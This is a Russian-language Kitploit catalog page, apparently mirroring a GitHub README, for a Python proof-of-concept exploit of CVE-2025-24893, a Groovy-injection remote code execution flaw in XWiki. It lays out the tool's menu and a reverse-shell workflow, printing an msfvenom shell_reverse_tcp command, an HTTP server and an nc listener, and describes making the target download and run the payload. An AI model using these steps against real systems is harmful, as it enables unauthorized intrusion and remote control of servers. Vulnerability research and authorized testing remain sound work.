Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24893 — PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints. | Kitploit
Инструменты/GitHubGitHub/infinit3i/cve-2025-24893
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationCommand and Control
GitHubinfinit3i/cve-2025-24893

CVE-2025-24893

PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.

Репозиторий
6111 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

XWiki CVE-2025-24893 Доказательство концепции

Авторы: Net.Doge & Infinit3i


Изображение CVE-2025-24893



Подписка в Twitter


Этот скрипт на Python эксплуатирует уязвимость CVE-2025-24893 — удаленное выполнение кода (RCE) в XWiki, вызванное некорректной изоляцией Groovy-макросов, отображаемых асинхронно. Он позволяет выполнять произвольные команды через внедрение в RSS-основанные конечные точки SolrSearch.

📌 Возможности

  • Выполнение одной команды через внедрение Groovy
  • Автоматическая генерация полезной нагрузки reverse shell (с помощью msfvenom)
  • Возможность настройки:
    • Удаленная цель
    • Локальный IP-адрес
    • Порт HTTP-сервера
    • Порт beacon reverse shell
  • Чистый предпросмотр bash-полезной нагрузки
  • Интерактивный TUI с цветовой кодировкой ANSI

🚀 Использование

  1. Клонируйте или скачайте скрипт.

  2. Убедитесь, что у вас установлено следующее:

    • msfvenom из Metasploit
    • Python 3
    • jq (используется в bash-полезных нагрузках)
  3. Запустите скрипт:

root@kitploit:~
python3 CVE-2025-24893-PoC.py
  1. Выберите из меню:

    • Run Command – Выполнить любую команду оболочки удаленно.
    • Reverse Shell – Сгенерировать и развернуть ELF reverse shell на цель.
    • Change Settings – Изменить LHOST, RHOST, порт сервера или порт beacon.

🧪 Рабочий процесс Reverse Shell

  1. Генерируется полезная нагрузка:
root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ваш_ip> LPORT=<порт_beacon> -f elf -o rev
  1. Вас попросят запустить Python HTTP-сервер и netcat-слушатель:
root@kitploit:~
python3 -m http.server 8080
nc -lvnp 31337
  1. Скрипт отправляет следующую последовательность на цель:

    • Скачать полезную нагрузку
    • Сделать её исполняемой
    • Выполнить бинарный файл

⚠️ Отказ от ответственности

Этот инструмент предназначен только для образовательных и авторизованных целей тестирования. Несанкционированное использование против систем, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.

📄 Ссылки

  • XWiki
  • MITRE CVE-2025-24893
Скачать инструмент